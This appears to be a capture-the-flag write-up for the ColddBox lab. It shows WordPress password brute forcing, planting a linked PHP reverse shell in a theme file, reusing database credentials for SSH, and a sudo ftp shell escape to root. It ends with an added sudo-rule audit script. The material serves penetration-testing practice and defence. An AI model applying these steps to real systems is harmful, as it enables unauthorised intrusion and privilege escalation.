# ColddBox

## Nmap

```
sudo nmap 10.10.189.203 -p- -sS -sV

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

With only port 80 worth enumerating for the moment, we can start here. The root page shows the site below, which we can see is powered by WordPress.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-968f01eef34292c8a5e9af7d9734014b132e5465%2Fimage.png?alt=media)

As we are dealing with WordPress, we can run WPScan against the target.

```
wpscan --url http://10.10.189.203 -t 40 -e ap,u1-1000 --passwords /usr/share/wordlists/rockyou.txt
```

WPScan soon identifies multiple users and then reports a successful login attempt as the user 'c0ldd'.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8af88fb8f159fecedd948a424b3d312fd34bf22d%2Fimage.png?alt=media)

Heading over to /wp-admin, we can then log in with the credentials we have found.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ef1e469ed564b4020b68f884f19c77708cdd6285%2Fimage.png?alt=media)

From here we can attempt to gain a reverse shell by editing one of the pages, ideally index.php. Head over to Appearance > Editor and on the right select Main Index. I then removed the original code and inserted a reverse shell which can be found here: <https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae177abbeef19fadcd1665a80a3170e52dbee795%2Fimage.png?alt=media)

After replacing the code and updating the file we can start a `netcat` listener on our attacking machine.

```
sudo nc -lvp 80
```

Then browse to index.php on the main page. The page should hang and we should have a shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-44fda05bbbeca26a0cbde1a8491baae94b91f4d8%2Fimage.png?alt=media)

I then upgraded the shell to something nicer using the command below:

```
/usr/bin/script -qc /bin/bash /dev/null
```

Manually enumerating the machine, we find the user c0ldd. Apart from a user flag, nothing interesting was inside the home directory. We know that WordPress is installed, so we can check wp-config.php located at:

`/var/www/html/wp-config.php`

Viewing this file we come across some database information.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0c59699c4e25ab614bc52b80cb85987bc034af0c%2Fimage.png?alt=media)

I then used the same credentials against SSH and was able to log in as c0ldd. As SSH is running on port 4512, the `-p` switch was used to specify an alternate port.

```
ssh -p 4512 c0ldd@10.10.189.203 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-14da9c3794372cbb09e6dfd95caa588ceb80dae2%2Fimage.png?alt=media)

Checking sudo with `sudo -l` shows we can run the following commands on the target machine as root.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aa3149e5ba9ea818695b51a2d191ec216df6875c%2Fimage.png?alt=media)

Checking [GTFOBins](https://gtfobins.github.io/gtfobins/ftp/#sudo) against the FTP binary shows this can be used to gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-df5d6e1d0c8cbbadd2d274baa68c766460067ef1%2Fimage.png?alt=media)

```
sudo -u root /usr/bin/ftp
!/bin/sh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a781f98a84a300b4c26ad5115a88416228d0a082%2Fimage.png?alt=media)
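
From the defender's side, the sudo rule is the finding to fix: `ftp` offers a `!` shell escape, so delegating it through sudo delegates root. The script below is an added example, not part of the original write-up; it audits `sudo -l` output for such rules. The sample output, the user `deploy`, the host `web01` and the `ESCAPE_BINS` list (only `ftp`, taken from this page) are assumptions.

```shell
# Added example: flag sudo rules that let a user run, as root, a program
# with an interactive shell escape. Assumption: ESCAPE_BINS holds only ftp,
# the binary named on this page; extend it from your own review.
ESCAPE_BINS="ftp"

# Constructed `sudo -l` output; user and host are made up.
sample_sudo_l() {
cat <<'EOF'
User deploy may run the following commands on web01:
    (root) /usr/sbin/service apache2 restart, /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/ftp
    (backup) /usr/bin/ftp
    (ALL : ALL) ALL
EOF
}

# Reads `sudo -l` output on stdin; prints "RISK (<runas>) <command>" for each
# granted command that is ALL or an escape-capable binary run as root/ALL.
audit_sudo_l() {
    while IFS= read -r line; do
        # Only rule lines carry a "(runas)" specification
        case "$line" in *"("*")"*) ;; *) continue ;; esac
        runas=${line#*"("}; runas=${runas%%")"*}
        runas_user=$(printf '%s' "${runas%%:*}" | tr -d ' ')
        # Skip rules whose target user is not root-equivalent
        case "$runas_user" in root|ALL) ;; *) continue ;; esac
        cmds=${line#*")"}
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            # Strip leading blanks and tags such as "NOPASSWD:"
            cmd=$(printf '%s' "$cmd" |
                sed -e 's/^[[:space:]]*//' -e 's/^\([A-Z_]*:[[:space:]]*\)*//')
            bin=${cmd%% *}         # program path, arguments dropped
            if [ "$bin" = "ALL" ]; then
                echo "RISK ($runas_user) ALL"
                continue
            fi
            for name in $ESCAPE_BINS; do
                if [ "${bin##*/}" = "$name" ]; then
                    echo "RISK ($runas_user) $bin"
                fi
            done
        done
    done
}

sample_sudo_l | audit_sudo_l
```

Each `RISK` line is a rule to remove or replace with a narrowly scoped wrapper; the rule for the `backup` run-as user is skipped because it does not yield root.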
